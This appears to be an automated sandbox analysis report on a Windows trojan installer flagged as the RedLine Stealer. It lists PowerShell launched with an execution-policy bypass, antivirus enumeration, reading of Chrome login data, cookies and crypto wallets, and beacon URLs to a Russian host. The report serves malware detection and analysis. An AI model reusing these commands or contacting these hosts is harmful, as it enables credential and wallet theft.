          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0049D1D0 FindFirstFileW,FindClose,0_2_0049D1D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00451410 FindFirstFileW,FindNextFileW,FindClose,0_2_00451410
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile Volume queried: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeFile Volume queried: C:\Users\user\AppData\Roaming\Helper Company LLC\Helper 1.0.0\install FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00481960 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,__Init_thread_footer,LoadLibraryW,GetProcAddress,SHGetPathFromIDListW,SHGetMalloc,0_2_00481960
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0053A0DB mov eax, dword ptr fs:[00000030h]0_2_0053A0DB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0053A11F mov eax, dword ptr fs:[00000030h]0_2_0053A11F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0052B5D7 mov ecx, dword ptr fs:[00000030h]0_2_0052B5D7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0051F9A7 mov esi, dword ptr fs:[00000030h]0_2_0051F9A7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_005250F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005250F3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0049FBF0 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,0_2_0049FBF0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0051FA13 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_0051FA13
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0038B0B0 __set_se_translator,SetUnhandledExceptionFilter,0_2_0038B0B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00520536 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00520536
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_005250F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005250F3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0038DA20 __set_se_translator,SetUnhandledExceptionFilter,0_2_0038DA20

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Bypasses PowerShell execution policy
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\helper company llc\helper 1.0.0\install\helper.msi" ai_setupexepath=c:\users\user\desktop\securiteinfo.com.win32.trojan-gen.16963.11783.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1692672474 "
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss6e59.ps1" -propfile "c:\users\user\appdata\local\temp\msi6e45.txt" -scriptfile "c:\users\user\appdata\local\temp\scr6e46.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr6e47.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "c:\windows\system32\msiexec.exe" /i "c:\users\user\appdata\roaming\helper company llc\helper 1.0.0\install\helper.msi" ai_setupexepath=c:\users\user\desktop\securiteinfo.com.win32.trojan-gen.16963.11783.exe setupexedir=c:\users\user\desktop\ exe_cmd_line="/exenoupdates /forcecleanup /wintime 1692672474 " Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss6e59.ps1" -propfile "c:\users\user\appdata\local\temp\msi6e45.txt" -scriptfile "c:\users\user\appdata\local\temp\scr6e46.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr6e47.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss6E59.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi6E45.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr6E46.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr6E47.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_0046E790 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,0_2_0046E790
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: GetLocaleInfoW,GetLocaleInfoW,0_2_00495A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00520F72 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00520F72
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004AAC30 GetUserNameW,GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,0_2_004AAC30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_004AC2F0 CreateNamedPipeW,CreateFileW,0_2_004AC2F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeCode function: 0_2_00357480 GetVersionExW,GetVersionExW,GetVersionExW,IsProcessorFeaturePresent,0_2_00357480
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : select * from AntiVirusProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB BlobJump to behavior
          Source: powershell.exe, 00000006.00000003.396230432.0000000007A68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected RedLine Stealer
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Crypto Currency Wallets
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected RedLine Stealer
          Source: Yara matchFile source: dump.pcap, type: PCAP

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Replication Through Removable Media          		221
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		1
          System Time Discovery          		1
          Replication Through Removable Media          		1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Native API          		Boot or Logon Initialization Scripts12
          Process Injection          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory11
          Peripheral Device Discovery          		Remote Desktop Protocol2
          Data from Local System          		Exfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts12
          Command and Scripting Interpreter          		Logon Script (Windows)Logon Script (Windows)2
          Obfuscated Files or Information          		Security Account Manager1
          Account Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Non-Standard Port          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell          		Logon Script (Mac)Logon Script (Mac)1
          Timestomp          		NTDS2
          File and Directory Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer2
          Non-Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets128
          System Information Discovery          		SSHKeyloggingData Transfer Size Limits13
          Application Layer Protocol          		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          File Deletion          		Cached Domain Credentials261
          Security Software Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items21
          Masquerading          		DCSync1
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Modify Registry          		Proc Filesystem231
          Virtualization/Sandbox Evasion          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)231
          Virtualization/Sandbox Evasion          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)12
          Process Injection          		Network Sniffing1
          System Owner/User Discovery          		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture1
          Remote System Discovery          		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1294691 Sample: SecuriteInfo.com.Win32.Troj... Startdate: 21/08/2023 Architecture: WINDOWS Score: 50 51 Snort IDS alert for network traffic 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 Yara detected RedLine Stealer 2->55 57 Yara detected MalDoc 2->57 8 msiexec.exe 3 15 2->8         started        11 SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe 22 2->11         started        process3 file4 27 C:\Windows\Installer\6766e2.msi, Composite 8->27 dropped 29 C:\Windows\Installer\MSI6D80.tmp, PE32 8->29 dropped 31 C:\Windows\Installer\MSI6B9A.tmp, PE32 8->31 dropped 39 4 other files (none is malicious) 8->39 dropped 13 msiexec.exe 9 8->13         started        16 msiexec.exe 8->16         started        33 C:\Users\user\AppData\Roaming\...\Helper.msi, Composite 11->33 dropped 35 C:\Users\user\AppData\Local\...\shi6220.tmp, PE32+ 11->35 dropped 37 C:\Users\user\AppData\Local\...\MSI634A.tmp, PE32 11->37 dropped 19 msiexec.exe 2 11->19         started        process5 file6 41 C:\Users\user\AppData\Local\...\scr6E46.ps1, Unicode 13->41 dropped 43 C:\Users\user\AppData\Local\...\pss6E59.ps1, Unicode 13->43 dropped 21 powershell.exe 15 20 13->21         started        49 Bypasses PowerShell execution policy 16->49 signatures7 process8 dnsIp9 45 45.135.232.24, 49747, 9878 ASBAXETNRU Russian Federation 21->45 47 prkl-ads.ru 81.177.140.69, 443, 49735, 49736 RTCOMM-ASRU Russian Federation 21->47 59 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 21->59 61 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 21->61 63 Tries to harvest and steal browser information (history, passwords, etc) 21->63 65 Tries to steal Crypto Currency Wallets 21->65 25 conhost.exe 21->25         started        signatures10 process11

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe13%ReversingLabs

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\MSI634A.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\shi6220.tmp0%ReversingLabs
          C:\Windows\Installer\MSI69F0.tmp0%ReversingLabs
          C:\Windows\Installer\MSI6AAC.tmp0%ReversingLabs
          C:\Windows\Installer\MSI6AFB.tmp0%ReversingLabs
          C:\Windows\Installer\MSI6B3B.tmp0%ReversingLabs
          C:\Windows\Installer\MSI6B9A.tmp0%ReversingLabs
          C:\Windows\Installer\MSI6D80.tmp0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://ns.adobe.cobj0%URL Reputationsafe
          http://ocsps.ssl.com00%URL Reputationsafe
          http://ns.adobe.c/g0%URL Reputationsafe
          http://ns.ado/10%URL Reputationsafe
          http://html4/loose.dtd0%Avira URL Cloudsafe
          http://.css0%Avira URL Cloudsafe
          http://.jpg0%Avira URL Cloudsafe
          https://prkl-ads.ru?status=reg&key=llks74638sj&site=Test0%Avira URL Cloudsafe
          https://prkl-ads.ru/?status=install0%Avira URL Cloudsafe
          http://crls.ssl.co0%Avira URL Cloudsafe
          https://prkl-ads.ru/?status=start&av=Windows%20Defender0%Avira URL Cloudsafe
          https://prkl-ads.ru/?status=start&av=$displayNamesString0%Avira URL Cloudsafe
          https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Test0%Avira URL Cloudsafe
          http://crl.m20%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prkl-ads.ru
          		81.177.140.69
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://prkl-ads.ru/?status=reg&key=llks74638sj&site=Testfalse
            • Avira URL Cloud: safe
            		unknown
            https://prkl-ads.ru/?status=start&av=Windows%20Defenderfalse
            • Avira URL Cloud: safe
            		unknown
            https://prkl-ads.ru/?status=installfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://html4/loose.dtdSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000003.372938403.0000000005592000.00000004.00000020.00020000.00000000.sdmp, shi6220.tmp.0.drfalse
            • Avira URL Cloud: safe
            		low
            http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0QSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, MSI6D31.tmp.1.dr, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drfalse
              		high
              http://ns.adobe.cobjpowershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://cert.ssl.com/SSLcom-SubCA-RSA-QSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://ocsps.ssl.com0SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, 6766e2.msi.1.dr, Helper1.cab.0.drfalse
                • URL Reputation: safe
                		unknown
                http://cert.ssl.com/SSLcom-SubCA-SecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, 00000000.00000002.770023014.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://ns.adobe.c/gpowershell.exe, 00000006.00000003.465169858.0000000007CD1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000003.473628082.0000000007CE7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://prkl-ads.ru?status=reg&key=llks74638sj&site=TestSecuriteInfo.com.Win32.Trojan-gen.16963.11783.exe, Helper.msi.0.dr, scr6E46.ps1.4.dr, 6766e2.msi.1.drfalse
                  • Avira URL Cloud: safe
                  		unknown
